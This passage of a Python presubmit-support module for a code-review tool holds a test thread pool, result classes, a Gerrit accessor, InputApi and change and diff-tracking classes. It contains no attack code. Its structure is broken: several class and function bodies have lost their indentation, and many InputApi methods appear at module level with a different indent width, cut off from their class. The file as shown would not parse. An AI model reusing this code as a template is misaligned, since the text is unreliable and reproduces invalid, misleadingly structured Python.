        code = p.returncode
        with self.__lock:
            self.__processes.discard(p)
            if code in self.sigint_returncodes:
                self.__on_sigint()
            if self.__got_sigint:
                raise self.ProcessWasInterrupted
        return stdout, stderr
sigint_handler = SigintHandler()
class ThreadPool(object):
    """Runs CommandData tests, optionally on a pool of worker threads."""
    def __init__(self, pool_size=None):
        self._pool_size = pool_size or multiprocessing.cpu_count()
        self._messages = []
        self._messages_lock = threading.Lock()
        self._tests = []               # tests safe to run in parallel
        self._tests_lock = threading.Lock()
        self._nonparallel_tests = []   # tests that must run sequentially
    def CallCommand(self, test):
        """Runs an external program.

        This function converts invocation of .py files and invocations of "python"
        to vpython invocations.  Returns a result message on failure (or an
        info message when test.info is set); None on silent success.
        """
        vpython = 'vpython.bat' if sys.platform == 'win32' else 'vpython'
        cmd = test.cmd
        if cmd[0] == 'python':
            cmd = list(cmd)  # copy so the caller's list is not mutated
            cmd[0] = vpython
        elif cmd[0].endswith('.py'):
            cmd = [vpython] + cmd
        try:
            start = time.time()
            p = subprocess.Popen(cmd, **test.kwargs)
            # waits through the global SIGINT-aware handler
            stdout, _ = sigint_handler.wait(p, test.stdin)
            duration = time.time() - start
        except OSError as e:
            duration = time.time() - start
            return test.message(
                '%s exec failure (%4.2fs)\n %s' % (test.name, duration, e))
        if p.returncode != 0:
            return test.message(
                '%s (%4.2fs) failed\n%s' % (test.name, duration, stdout))
        if test.info:
            return test.info('%s (%4.2fs)' % (test.name, duration))
    def AddTests(self, tests, parallel=True):
        """Queue tests; parallel ones go to workers, others run on this thread."""
        if parallel:
            self._tests.extend(tests)
        else:
            self._nonparallel_tests.extend(tests)
    def RunAsync(self):
        """Run all queued tests and return the collected result messages."""
        self._messages = []
        def _WorkerFn():
            # each worker pops tests until the shared list is drained
            while True:
                test = None
                with self._tests_lock:
                    if not self._tests:
                        break
                    test = self._tests.pop()
                result = self.CallCommand(test)
                if result:
                    with self._messages_lock:
                        self._messages.append(result)
        def _StartDaemon():
            t = threading.Thread(target=_WorkerFn)
            t.daemon = True
            t.start()
            return t
        # nonparallel tests run first, on the calling thread
        while self._nonparallel_tests:
            test = self._nonparallel_tests.pop()
            result = self.CallCommand(test)
            if result:
                self._messages.append(result)
        if self._tests:
            threads = [_StartDaemon() for _ in range(self._pool_size)]
            for worker in threads:
                worker.join()
        return self._messages
def normpath(path):
    """Normalize *path* like os.path.normpath, additionally converting any
    platform separators to forward slashes when not running on Windows.
    """
    # Replacing os.sep first is safe everywhere: the Windows normpath
    # converts forward slashes back to backslashes anyway.
    unified = path.replace(os.sep, '/')
    return os.path.normpath(unified)
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
class PresubmitOutput(object):
    """Collects presubmit output and tracks errors and prompts.

    Everything written is buffered in memory and, when an output stream
    is attached, echoed to it as well.
    """

    def __init__(self, input_stream=None, output_stream=None):
        self.input_stream = input_stream
        self.output_stream = output_stream
        self.reviewers = []
        self.more_cc = []
        self.written_output = []
        self.error_count = 0

    def prompt_yes_no(self, prompt_string):
        """Show a yes/no prompt; anything but 'y'/'yes' records a failure.

        With no input stream attached the prompt always fails.
        """
        self.write(prompt_string)
        if not self.input_stream:
            self.fail()
            return
        answer = self.input_stream.readline().strip().lower()
        if answer not in ('y', 'yes'):
            self.fail()

    def fail(self):
        """Record one error."""
        self.error_count += 1

    def should_continue(self):
        """True while no errors have been recorded."""
        return self.error_count == 0

    def write(self, s):
        """Buffer *s* and mirror it to the output stream, if any."""
        self.written_output.append(s)
        if self.output_stream:
            self.output_stream.write(s)

    def getvalue(self):
        """Everything written so far, joined into one string."""
        return ''.join(self.written_output)
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = long_text.rstrip()
def handle(self, output):
output.write(self._message)
output.write('\n')
for index, item in enumerate(self._items):
output.write(' ')
# Write separately in case it's unicode.
output.write(str(item))
if index < len(self._items) - 1:
output.write(' \\')
output.write('\n')
if self._long_text:
output.write('\n***************\n')
# Write separately in case it's unicode.
output.write(self._long_text)
output.write('\n***************\n')
if self.fatal:
output.fail()
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
    """A hard presubmit error."""
    # fatal: handle() will call output.fail(), blocking the presubmit.
    fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
    """A warning that prompts the user if they want to continue."""
    should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
    """Just print something to the screen -- but it's not even a warning."""
    # neither fatal nor prompting: purely informational
    pass
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
    """A warning that should be included in the review request email."""
    def __init__(self, *args, **kwargs):
        # BUG FIX: the old code first called
        # super(_MailTextResult, self).__init__() with no arguments, which
        # raised TypeError (missing `message`) before reaching the intended
        # NotImplementedError.  Raise the intended exception directly.
        raise NotImplementedError()
class GerritAccessor(object):
    """Limited Gerrit functionality for canned presubmit checks to work.

    To avoid excessive Gerrit calls, caches the results.
    """
    def __init__(self, host):
        self.host = host
        self.cache = {}  # issue number (int) -> change-detail dict
    def _FetchChangeDetail(self, issue):
        # Separate function to be easily mocked in tests.
        try:
            return gerrit_util.GetChangeDetail(
                self.host, str(issue),
                ['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
        except gerrit_util.GerritError as e:
            if e.http_status == 404:
                raise Exception('Either Gerrit issue %s doesn\'t exist, or '
                                'no credentials to fetch issue details' % issue)
            raise
    def GetChangeInfo(self, issue):
        """Returns labels and all revisions (patchsets) for this issue.

        The result is a dictionary according to Gerrit REST Api.
        https://gerrit-review.googlesource.com/Documentation/rest-api.html

        However, API isn't very clear what's inside, so see tests for example.
        """
        assert issue
        cache_key = int(issue)
        if cache_key not in self.cache:
            self.cache[cache_key] = self._FetchChangeDetail(issue)
        return self.cache[cache_key]
    def GetChangeDescription(self, issue, patchset=None):
        """If patchset is none, fetches current patchset."""
        info = self.GetChangeInfo(issue)
        # info is a reference to cache. We'll modify it here adding description to
        # it to the right patchset, if it is not yet there.
        # Find revision info for the patchset we want.
        if patchset is not None:
            # (.iteritems(): this file targets Python 2)
            for rev, rev_info in info['revisions'].iteritems():
                if str(rev_info['_number']) == str(patchset):
                    break
            else:
                raise Exception('patchset %s doesn\'t exist in issue %s' % (
                    patchset, issue))
        else:
            rev = info['current_revision']
            rev_info = info['revisions'][rev]
        return rev_info['commit']['message']
    def GetDestRef(self, issue):
        """Returns the fully-qualified destination branch ref of the change."""
        ref = self.GetChangeInfo(issue)['branch']
        if not ref.startswith('refs/'):
            # NOTE: it is possible to create 'refs/x' branch,
            # aka 'refs/heads/refs/x'. However, this is ill-advised.
            ref = 'refs/heads/%s' % ref
        return ref
    def GetChangeOwner(self, issue):
        """Returns the email of the change owner."""
        return self.GetChangeInfo(issue)['owner']['email']
    def GetChangeReviewers(self, issue, approving_only=True):
        """Returns reviewer emails; only max-score approvers when approving_only."""
        changeinfo = self.GetChangeInfo(issue)
        if approving_only:
            labelinfo = changeinfo.get('labels', {}).get('Code-Review', {})
            values = labelinfo.get('values', {}).keys()
            try:
                max_value = max(int(v) for v in values)
                reviewers = [r for r in labelinfo.get('all', [])
                             if r.get('value', 0) == max_value]
            except ValueError:  # values is the empty list
                reviewers = []
        else:
            reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
        return [r.get('email') for r in reviewers]
class OutputApi(object):
    """An instance of OutputApi gets passed to presubmit scripts so that they
    can output various types of results.
    """
    # Aliases exposing the module-private result classes to scripts.
    PresubmitResult = _PresubmitResult
    PresubmitError = _PresubmitError
    PresubmitPromptWarning = _PresubmitPromptWarning
    PresubmitNotifyResult = _PresubmitNotifyResult
    MailTextResult = _MailTextResult
    def __init__(self, is_committing):
        self.is_committing = is_committing  # True when running at commit time
        self.more_cc = []  # additional emails to CC on the change
    def AppendCC(self, cc):
        """Appends a user to cc for this change."""
        self.more_cc.append(cc)
    def PresubmitPromptOrNotify(self, *args, **kwargs):
        """Warn the user when uploading, but only notify if committing."""
        if self.is_committing:
            return self.PresubmitNotifyResult(*args, **kwargs)
        return self.PresubmitPromptWarning(*args, **kwargs)
class InputApi(object):
"""An instance of this object is passed to presubmit scripts so they can
know stuff about the change they're looking at.
"""
# Method could be a function
# pylint: disable=no-self-use
# File extensions that are considered source files from a style guide
# perspective. Don't modify this list from a presubmit script!
#
# Files without an extension aren't included in the list. If you want to
# filter them as source files, add r"(^|.*?[\\\/])[^.]+$" to the white list.
# Note that ALL CAPS files are black listed in DEFAULT_BLACK_LIST below.
DEFAULT_WHITE_LIST = (
# C++ and friends
r".+\.c$", r".+\.cc$", r".+\.cpp$", r".+\.h$", r".+\.m$", r".+\.mm$",
r".+\.inl$", r".+\.asm$", r".+\.hxx$", r".+\.hpp$", r".+\.s$", r".+\.S$",
# Scripts
r".+\.js$", r".+\.py$", r".+\.sh$", r".+\.rb$", r".+\.pl$", r".+\.pm$",
# Other
r".+\.java$", r".+\.mk$", r".+\.am$", r".+\.css$", r".+\.mojom$",
r".+\.fidl$"
)
# Path regexp that should be excluded from being considered containing source
# files. Don't modify this list from a presubmit script!
DEFAULT_BLACK_LIST = (
r"testing_support[\\\/]google_appengine[\\\/].*",
r".*\bexperimental[\\\/].*",
# Exclude third_party/.* but NOT third_party/{WebKit,blink}
# (crbug.com/539768 and crbug.com/836555).
r".*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*",
# Output directories (just in case)
r".*\bDebug[\\\/].*",
r".*\bRelease[\\\/].*",
r".*\bxcodebuild[\\\/].*",
r".*\bout[\\\/].*",
# All caps files like README and LICENCE.
r".*\b[A-Z0-9_]{2,}$",
# SCM (can happen in dual SCM configuration). (Slightly over aggressive)
r"(|.*[\\\/])\.git[\\\/].*",
r"(|.*[\\\/])\.svn[\\\/].*",
# There is no point in processing a patch file.
r".+\.diff$",
r".+\.patch$",
)
def __init__(self, change, presubmit_path, is_committing,
verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""Builds an InputApi object.
Args:
change: A presubmit.Change object.
presubmit_path: The path to the presubmit script being processed.
is_committing: True if the change is about to be committed.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
# Version number of the presubmit_support script.
self.version = [int(x) for x in __version__.split('.')]
self.change = change
self.is_committing = is_committing
self.gerrit = gerrit_obj
self.dry_run = dry_run
self.parallel = parallel
self.thread_pool = thread_pool or ThreadPool()
# We expose various modules and functions as attributes of the input_api
# so that presubmit scripts don't have to import them.
self.ast = ast
self.basename = os.path.basename
self.cPickle = cPickle
self.cpplint = cpplint
self.cStringIO = cStringIO
self.fnmatch = fnmatch
self.gclient_paths = gclient_paths
# TODO(yyanagisawa): stop exposing this when python3 become default.
# Since python3's tempfile has TemporaryDirectory, we do not need this.
self.temporary_directory = gclient_utils.temporary_directory
self.glob = glob.glob
self.json = json
self.logging = logging.getLogger('PRESUBMIT')
self.marshal = marshal
self.os_listdir = os.listdir
self.os_path = os.path
self.os_stat = os.stat
self.os_walk = os.walk
self.pickle = pickle
self.re = re
self.subprocess = subprocess
self.tempfile = tempfile
self.time = time
self.traceback = traceback
self.unittest = unittest
self.urllib2 = urllib2
self.is_windows = sys.platform == 'win32'
# Set python_executable to 'python'. This is interpreted in CallCommand to
# convert to vpython in order to allow scripts in other repos (e.g. src.git)
# to automatically pick up that repo's .vpython file, instead of inheriting
# the one in depot_tools.
self.python_executable = 'python'
self.environ = os.environ
# InputApi.platform is the platform you're currently running on.
self.platform = sys.platform
self.cpu_count = multiprocessing.cpu_count()
# The local path of the currently-being-processed presubmit script.
self._current_presubmit_path = os.path.dirname(presubmit_path)
# We carry the canned checks so presubmit scripts can easily use them.
self.canned_checks = presubmit_canned_checks
# Temporary files we must manually remove at the end of a run.
self._named_temporary_files = []
# TODO(dpranke): figure out a list of all approved owners for a repo
# in order to be able to handle wildcard OWNERS files?
self.owners_db = owners.Database(change.RepositoryRoot(),
fopen=file, os_path=self.os_path)
self.owners_finder = owners_finder.OwnersFinder
self.verbose = verbose
self.Command = CommandData
# Replace <hash_map> and <hash_set> as headers that need to be included
# with "base/containers/hash_tables.h" instead.
# Access to a protected member _XX of a client class
# pylint: disable=protected-access
self.cpplint._re_pattern_templates = [
(a, b, 'base/containers/hash_tables.h')
if header in ('<hash_map>', '<hash_set>') else (a, b, header)
for (a, b, header) in cpplint._re_pattern_templates
]
def PresubmitLocalPath(self):
  """Returns the local path of the presubmit script currently being run.

  Handy for locating files relative to the PRESUBMIT.py script itself, so
  the script keeps working when the tree is branched or relocated, without
  hard-coding absolute paths.
  """
  return self._current_presubmit_path
def AffectedFiles(self, include_deletes=True, file_filter=None):
  """Like input_api.change.AffectedFiles(), but restricted to files (and
  optionally directories) living under the current presubmit script's
  directory, or subdirectories thereof.
  """
  prefix = normpath("%s/" % self.PresubmitLocalPath())
  # A single-character prefix means the repository root itself; match all.
  if len(prefix) == 1:
    prefix = ''
  return filter(
      lambda af: normpath(af.AbsoluteLocalPath()).startswith(prefix),
      self.change.AffectedFiles(include_deletes, file_filter))
def LocalPaths(self):
  """Returns local paths of input_api.AffectedFiles()."""
  result = [affected.LocalPath() for affected in self.AffectedFiles()]
  logging.debug("LocalPaths: %s", result)
  return result
def AbsoluteLocalPaths(self):
  """Returns absolute local paths of input_api.AffectedFiles()."""
  return [affected.AbsoluteLocalPath() for affected in self.AffectedFiles()]
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
  """Like input_api.change.AffectedTestableFiles(), but restricted to files
  under the current presubmit script's directory or subdirectories thereof.
  """
  if include_deletes is not None:
    # The parameter is accepted only for backwards compatibility.
    warn("AffectedTestableFiles(include_deletes=%s)"
         " is deprecated and ignored" % str(include_deletes),
         category=DeprecationWarning,
         stacklevel=2)
  is_testable = lambda af: af.IsTestableFile()
  return filter(is_testable, self.AffectedFiles(include_deletes=False, **kwargs))
def AffectedTextFiles(self, include_deletes=None):
  """Backwards-compatible alias for AffectedTestableFiles()."""
  return self.AffectedTestableFiles(include_deletes=include_deletes)
def FilterSourceFile(self, affected_file, white_list=None, black_list=None):
  """Decides whether |affected_file| counts as a "source file".

  Falls back to InputApi.DEFAULT_WHITE_LIST / InputApi.DEFAULT_BLACK_LIST
  when the corresponding argument is None.  Each list entry is treated as a
  regular expression matched against AffectedFile.LocalPath(); the file must
  match the white list and must not match the black list.

  Note: Copy-paste this function to suit your needs or use a lambda function.
  """
  local_path = affected_file.LocalPath()

  def matches_any(patterns):
    # True as soon as any pattern matches the local path.
    for pattern in patterns:
      if self.re.match(pattern, local_path):
        return True
    return False

  return (matches_any(white_list or self.DEFAULT_WHITE_LIST) and
          not matches_any(black_list or self.DEFAULT_BLACK_LIST))
def AffectedSourceFiles(self, source_file):
  """Filters AffectedTestableFiles() through the |source_file| predicate.

  When |source_file| is None, InputApi.FilterSourceFile() is used instead.
  """
  predicate = source_file or self.FilterSourceFile
  return filter(predicate, self.AffectedTestableFiles())
def RightHandSideLines(self, source_file_filter=None):
  """Iterates over all text lines of the "new" side of changed files.

  Only yields lines from new or modified text files in the change that are
  contained by the directory of the currently executing presubmit script.
  Useful for line-by-line regex checks such as trailing-whitespace detection.

  Yields:
    a 3 tuple:
      the AffectedFile instance of the current file;
      integer line number (1-based); and
      the contents of the line as a string.

  Note: The carriage return (LF or CR) is stripped off.
  """
  return _RightHandSideLinesImpl(self.AffectedSourceFiles(source_file_filter))
def ReadFile(self, file_item, mode='r'):
  """Reads an arbitrary file, refusing any path outside the repository."""
  path = file_item
  if isinstance(path, AffectedFile):
    path = path.AbsoluteLocalPath()
  if not path.startswith(self.change.RepositoryRoot()):
    raise IOError('Access outside the repository root is denied.')
  return gclient_utils.FileRead(path, mode)
def CreateTemporaryFile(self, **kwargs):
  """Returns a named temporary file that must be removed with a call to
  RemoveTemporaryFiles().

  All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
  except for |delete|, which is always set to False.

  Presubmit checks that need to create a temporary file and pass it for
  reading should use this function instead of NamedTemporaryFile(), as
  Windows fails to open a file that is already open for writing.

    with input_api.CreateTemporaryFile() as f:
      f.write('xyz')
      f.close()
      input_api.subprocess.check_output(['script-that', '--reads-from',
                                         f.name])

  Note that callers of CreateTemporaryFile() should not worry about removing
  any temporary file; this is done transparently by the presubmit handling
  code.
  """
  # |delete| is owned by this API: we always pass delete=False and remove the
  # files ourselves, so forwarding it would only produce confusing errors.
  if 'delete' in kwargs:
    raise TypeError('CreateTemporaryFile() does not take a "delete" '
                    'argument, file deletion is handled automatically by '
                    'the same presubmit_support code that creates InputApi '
                    'objects.')
  handle = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
  self._named_temporary_files.append(handle.name)
  return handle
@property
def tbr(self):
  """Returns if a change is TBR'ed.

  True when a TBR= tag is present; otherwise the (possibly empty, hence
  falsy) list of TBR reviewers parsed from the description footers.
  """
  if 'TBR' in self.change.tags:
    return True
  return self.change.TBRsFromDescription()
def RunTests(self, tests_mix, parallel=True):
  """Queues tests on the shared ThreadPool and returns immediate messages.

  RunTests doesn't actually run tests. It adds them to a ThreadPool that
  will run all tests once all PRESUBMIT files are processed.
  """
  queued = []
  messages = []
  parallel = parallel and self.parallel
  for item in tests_mix:
    # Results produced eagerly by the presubmit script pass straight through.
    if isinstance(item, OutputApi.PresubmitResult) and item:
      messages.append(item)
      continue
    assert issubclass(item.message, _PresubmitResult)
    queued.append(item)
    if self.verbose:
      item.info = _PresubmitNotifyResult
    if not item.kwargs.get('cwd'):
      item.kwargs['cwd'] = self.PresubmitLocalPath()
  self.thread_pool.AddTests(queued, parallel)
  if not parallel:
    messages.extend(self.thread_pool.RunAsync())
  return messages
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
  """DiffCache implementation for git; gets all file diffs at once."""

  def __init__(self, upstream):
    super(_GitDiffCache, self).__init__(upstream=upstream)
    # Maps normalized path -> full diff text; populated lazily on first use.
    self._diffs_by_file = None

  def GetDiff(self, path, local_root):
    if not self._diffs_by_file:
      # A single git invocation for the whole tree is much faster than one
      # diff per file.  Passing no filenames also sidesteps command-line
      # length limits that would make GenerateDiff fail on some platforms.
      unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
                                          branch=self._upstream)
      # The path appears twice, separated by a space, and may itself contain
      # spaces — hence the backreference.
      file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
      per_file = {}
      current_diff = []
      for diff_line in unified_diff.splitlines(True):
        match = file_marker.match(diff_line)
        if match:
          # Marks the start of a new per-file section.
          current_diff = [diff_line]
          per_file[match.group('filename')] = current_diff
        elif diff_line.startswith('diff --git'):
          raise PresubmitFailure('Unexpected diff line: %s' % diff_line)
        else:
          current_diff.append(diff_line)
      self._diffs_by_file = dict(
          (normpath(name), ''.join(text)) for name, text in per_file.items())
    if path not in self._diffs_by_file:
      raise PresubmitFailure(
          'Unified diff did not contain entry for file %s' % path)
    return self._diffs_by_file[path]

  def GetOldContents(self, path, local_root):
    return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
class AffectedFile(object):
  """Representation of a file in a change."""

  # Diff-cache class to instantiate; subclasses override with an
  # SCM-specific implementation (e.g. _GitDiffCache).
  DIFF_CACHE = _DiffCache

  # Method could be a function
  # pylint: disable=no-self-use
  def __init__(self, path, action, repository_root, diff_cache):
    # Path as provided by the SCM, relative to the repository root.
    self._path = path
    # Single-letter SCM action code, e.g. 'A', 'M', 'D'.
    self._action = action
    self._local_root = repository_root
    self._is_directory = None
    # Lazily-filled caches for ChangedContents() / NewContents().
    self._cached_changed_contents = None
    self._cached_new_contents = None
    self._diff_cache = diff_cache
    logging.debug('%s(%s)', self.__class__.__name__, self._path)

  def LocalPath(self):
    """Returns the path of this file on the local disk relative to client root.

    This should be used for error messages but not for accessing files,
    because presubmit checks are run with CWD=PresubmitLocalPath() (which is
    often != client root).
    """
    return normpath(self._path)

  def AbsoluteLocalPath(self):
    """Returns the absolute path of this file on the local disk."""
    return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))

  def Action(self):
    """Returns the action on this opened file, e.g. A, M, D, etc."""
    return self._action

  def IsTestableFile(self):
    """Returns True if the file is a text file and not a binary file.

    Deleted files are not text file."""
    raise NotImplementedError()  # Implement when needed

  def IsTextFile(self):
    """An alias to IsTestableFile for backwards compatibility."""
    return self.IsTestableFile()

  def OldContents(self):
    """Returns an iterator over the lines in the old version of file.

    The old version is the file before any modifications in the user's
    workspace, i.e. the "left hand side".

    Contents will be empty if the file is a directory or does not exist.
    Note: The carriage returns (LF or CR) are stripped off.
    """
    return self._diff_cache.GetOldContents(self.LocalPath(),
                                           self._local_root).splitlines()

  def NewContents(self):
    """Returns an iterator over the lines in the new version of file.

    The new version is the file in the user's workspace, i.e. the "right hand
    side".

    Contents will be empty if the file is a directory or does not exist.
    Note: The carriage returns (LF or CR) are stripped off.
    """
    if self._cached_new_contents is None:
      self._cached_new_contents = []
      try:
        self._cached_new_contents = gclient_utils.FileRead(
            self.AbsoluteLocalPath(), 'rU').splitlines()
      except IOError:
        pass  # File not found? That's fine; maybe it was deleted.
    # Return a copy so callers cannot mutate the cache.
    return self._cached_new_contents[:]

  def ChangedContents(self):
    """Returns a list of tuples (line number, line text) of all new lines.

    This relies on the scm diff output describing each changed code section
    with a line of the form:

      ^@@ <old line num>,<old size> <new line num>,<new size> @@$
    """
    if self._cached_changed_contents is not None:
      return self._cached_changed_contents[:]
    self._cached_changed_contents = []
    line_num = 0

    for line in self.GenerateScmDiff().splitlines():
      # A hunk header resets the running "new side" line counter.
      m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
      if m:
        line_num = int(m.groups(1)[0])
        continue
      # '+' lines (but not the '+++' file header) are added lines.
      if line.startswith('+') and not line.startswith('++'):
        self._cached_changed_contents.append((line_num, line[1:]))
      if not line.startswith('-'):
        # Context and added lines both advance the new-side line number;
        # removed ('-') lines do not exist on the new side.
        line_num += 1
    return self._cached_changed_contents[:]

  def __str__(self):
    return self.LocalPath()

  def GenerateScmDiff(self):
    # Delegates to the SCM-specific diff cache.
    return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
class GitAffectedFile(AffectedFile):
  """Representation of a file in a change out of a git checkout."""
  # Method 'NNN' is abstract in class 'NNN' but is not overridden
  # pylint: disable=abstract-method
  DIFF_CACHE = _GitDiffCache

  def __init__(self, *args, **kwargs):
    AffectedFile.__init__(self, *args, **kwargs)
    self._server_path = None
    # Tri-state cache: None means "not computed yet".
    self._is_testable_file = None

  def IsTestableFile(self):
    if self._is_testable_file is None:
      # A deleted file is never testable; otherwise probe the filesystem.
      self._is_testable_file = (
          self.Action() != 'D' and os.path.isfile(self.AbsoluteLocalPath()))
    return self._is_testable_file
class Change(object):
  """Describe a change.

  Used directly by the presubmit scripts to query the current change being
  tested.

  Instance members:
    tags: Dictionary of KEY=VALUE pairs found in the change description.
    self.KEY: equivalent to tags['KEY']
  """

  # AffectedFile subclass to instantiate; overridden by SCM subclasses.
  _AFFECTED_FILES = AffectedFile

  # Matches key/value (or "tag") lines in changelist descriptions.
  TAG_LINE_RE = re.compile(
      '^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
  scm = ''

  def __init__(
      self, name, description, local_root, files, issue, patchset, author,
      upstream=None):
    if files is None:
      files = []
    self._name = name
    # Convert root into an absolute path.
    self._local_root = os.path.abspath(local_root)
    self._upstream = upstream
    self.issue = issue
    self.patchset = patchset
    self.author_email = author

    self._full_description = ''
    self.tags = {}
    self._description_without_tags = ''
    self.SetDescriptionText(description)

    # Each entry must be an (action, path) pair.
    assert all(
        (isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files

    # One shared diff cache for all affected files of this change.
    diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
    self._affected_files = [
        self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
        for action, path in files
    ]

  def Name(self):
    """Returns the change name."""
    return self._name

  def DescriptionText(self):
    """Returns the user-entered changelist description, minus tags.

    Any line in the user-provided description starting with e.g. "FOO="
    (whitespace permitted before and around) is considered a tag line.  Such
    lines are stripped out of the description this function returns.
    """
    return self._description_without_tags

  def FullDescriptionText(self):
    """Returns the complete changelist description including tags."""
    return self._full_description

  def SetDescriptionText(self, description):
    """Sets the full description text (including tags) to |description|.

    Also updates the list of tags."""
    self._full_description = description

    # From the description text, build up a dictionary of key/value pairs
    # plus the description minus all key/value or "tag" lines.
    description_without_tags = []
    self.tags = {}
    for line in self._full_description.splitlines():
      m = self.TAG_LINE_RE.match(line)
      if m:
        self.tags[m.group('key')] = m.group('value')
      else:
        description_without_tags.append(line)

    # Change back to text and remove whitespace at end.
    self._description_without_tags = (
        '\n'.join(description_without_tags).rstrip())

  def RepositoryRoot(self):
    """Returns the repository (checkout) root directory for this change,
    as an absolute path.
    """
    return self._local_root

  def __getattr__(self, attr):
    """Return tags directly as attributes on the object."""
    # NOTE(review): this pattern rejects digits, so some keys captured by
    # TAG_LINE_RE (e.g. 'BUG2') are unreachable as attributes; kept as-is
    # since callers may rely on the AttributeError.
    if not re.match(r"^[A-Z_]*$", attr):
      raise AttributeError(self, attr)
    return self.tags.get(attr)

  def BugsFromDescription(self):
    """Returns all bugs referenced in the commit description."""
    tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()]
    footers = []
    unsplit_footers = git_footers.parse_footers(self._full_description).get(
        'Bug', [])
    for unsplit_footer in unsplit_footers:
      footers += [b.strip() for b in unsplit_footer.split(',')]
    return sorted(set(tags + footers))

  def ReviewersFromDescription(self):
    """Returns all reviewers listed in the commit description."""
    # We don't support a "R:" git-footer for reviewers; that is in metadata.
    tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
    return sorted(set(tags))

  def TBRsFromDescription(self):
    """Returns all TBR reviewers listed in the commit description."""
    tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
    # TODO(agable): Remove support for 'Tbr:' when TBRs are programmatically
    # determined by self-CR+1s.
    footers = git_footers.parse_footers(self._full_description).get('Tbr', [])
    return sorted(set(tags + footers))

  # TODO(agable): Delete these once we're sure they're unused.
  @property
  def BUG(self):
    return ','.join(self.BugsFromDescription())
  @property
  def R(self):
    return ','.join(self.ReviewersFromDescription())
  @property
  def TBR(self):
    return ','.join(self.TBRsFromDescription())

  def AllFiles(self, root=None):
    """List all files under source control in the repo."""
    raise NotImplementedError()

  def AffectedFiles(self, include_deletes=True, file_filter=None):
    """Returns a list of AffectedFile instances for all files in the change.

    Args:
      include_deletes: If false, deleted files will be filtered out.
      file_filter: An additional filter to apply.

    Returns:
      [AffectedFile(path, action), AffectedFile(path, action)]
    """
    affected = filter(file_filter, self._affected_files)

    if include_deletes:
      return affected
    return filter(lambda x: x.Action() != 'D', affected)

  def AffectedTestableFiles(self, include_deletes=None, **kwargs):
    """Return a list of the existing text files in a change."""
    if include_deletes is not None:
      # Fixed typo: the warning used to say "AffectedTeestableFiles".
      warn("AffectedTestableFiles(include_deletes=%s)"
           " is deprecated and ignored" % str(include_deletes),
           category=DeprecationWarning,
           stacklevel=2)
    return filter(lambda x: x.IsTestableFile(),
                  self.AffectedFiles(include_deletes=False, **kwargs))

  def AffectedTextFiles(self, include_deletes=None):
    """An alias to AffectedTestableFiles for backwards compatibility."""
    return self.AffectedTestableFiles(include_deletes=include_deletes)

  def LocalPaths(self):
    """Convenience function."""
    return [af.LocalPath() for af in self.AffectedFiles()]

  def AbsoluteLocalPaths(self):
    """Convenience function."""
    return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]

  def RightHandSideLines(self):
    """An iterator over all text lines in "new" version of changed files.

    Lists lines from new or modified text files in the change.

    This is useful for doing line-by-line regex checks, like checking for
    trailing whitespace.

    Yields:
      a 3 tuple:
        the AffectedFile instance of the current file;
        integer line number (1-based); and
        the contents of the line as a string.
    """
    return _RightHandSideLinesImpl(
        x for x in self.AffectedFiles(include_deletes=False)
        if x.IsTestableFile())

  def OriginalOwnersFiles(self):
    """A map from path names of affected OWNERS files to their old content."""
    def owners_file_filter(f):
      return 'OWNERS' in os.path.split(f.LocalPath())[1]
    files = self.AffectedFiles(file_filter=owners_file_filter)
    return dict([(f.LocalPath(), f.OldContents()) for f in files])
class GitChange(Change):
  _AFFECTED_FILES = GitAffectedFile
  scm = 'git'

  def AllFiles(self, root=None):
    """List all files under source control in the repo."""
    root = root or self.RepositoryRoot()
    cmd = ['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.']
    return subprocess.check_output(cmd, cwd=root).splitlines()
def ListRelevantPresubmitFiles(files, root):
  """Finds all presubmit files that apply to a given set of source files.

  If inherit-review-settings-ok is present right under root, looks for
  PRESUBMIT.py in directories enclosing root.

  Args:
    files: An iterable container containing file paths.
